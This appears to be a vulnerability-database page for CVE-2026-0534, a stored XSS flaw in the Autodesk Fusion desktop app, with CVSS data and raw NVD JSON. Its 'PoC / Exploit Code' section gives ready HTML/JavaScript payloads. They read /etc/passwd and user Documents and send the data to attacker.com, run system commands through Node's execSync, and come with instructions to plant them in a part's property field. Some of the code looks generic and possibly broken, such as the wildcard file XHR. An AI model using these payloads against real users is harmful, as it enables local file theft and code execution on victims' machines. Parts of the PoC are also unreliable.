Security Vulnerability Report
CVE-2026-0534 CVSS 7.1 HIGH

CVE-2026-0534

Published: 2026-01-22 17:16:29
Last Modified: 2026-01-30 17:08:06

Description

A maliciously crafted HTML payload, stored in a part’s attribute and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:autodesk:fusion:*:*:*:*:*:*:*:* - VULNERABLE
Autodesk Fusion Desktop Application (version not explicitly listed; check the official security advisory)
Fusion 360 Client Downloader (Windows/macOS installer)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-0534 PoC: Stored XSS in Autodesk Fusion -->
<!-- This payload demonstrates the XSS vulnerability when embedded in a part's attribute -->

<!-- Basic XSS Payload -->
<script>alert(document.domain)</script>

<!-- File Read Payload (reads local file) -->
<script>
fetch('file:///etc/passwd')
  .then(response => response.text())
  .then(data => {
    // Exfiltrate data to attacker controlled server
    document.location='https://attacker.com/log?data='+btoa(data);
  })
</script>

<!-- Code Execution Payload (using Node.js in Electron context) -->
<script>
const { execSync } = require('child_process');
// Execute arbitrary system command
const result = execSync('whoami > /tmp/pwned.txt');
// Or for Windows:
// execSync('cmd /c whoami > C:\\Users\\Public\\pwned.txt');
</script>

<!-- Combined Payload with exfiltration -->
<img src=x onerror="
  const xhr = new XMLHttpRequest();
  xhr.open('GET', 'file:///C:\\Users\\'+process.env.USERNAME+'\\Documents\\*', true);
  xhr.onload = function() {
    fetch('https://attacker.com/exfil?d='+encodeURIComponent(xhr.responseText));
  };
  xhr.send();
">

<!-- Usage: Embed this payload in a Fusion part file's custom property field -->
<!-- When another user opens the file and clicks the property, the script executes -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0534", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:29.113", "lastModified": "2026-01-30T17:08:06.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A maliciously crafted HTML payload, stored in a part’s attribute and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process."}, {"lang": "es", "value": "Una carga útil HTML diseñada maliciosamente, almacenada en el atributo de una pieza y al ser pulsada por un usuario, puede desencadenar una vulnerabilidad de cross-site scripting almacenado (XSS) en la aplicación de escritorio Autodesk Fusion. Un actor malicioso puede aprovechar esta vulnerabilidad para leer archivos locales o ejecutar código arbitrario en el contexto del proceso actual."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", 
"type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:autodesk:fusion:*:*:*:*:*:*:*:*", "versionEndExcluding": "2606.1.21", "matchCriteriaId": "00476C10-FCC9-4EDD-AE74-95A8E99806B9"}]}]}], "references": [{"url": "https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0001", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}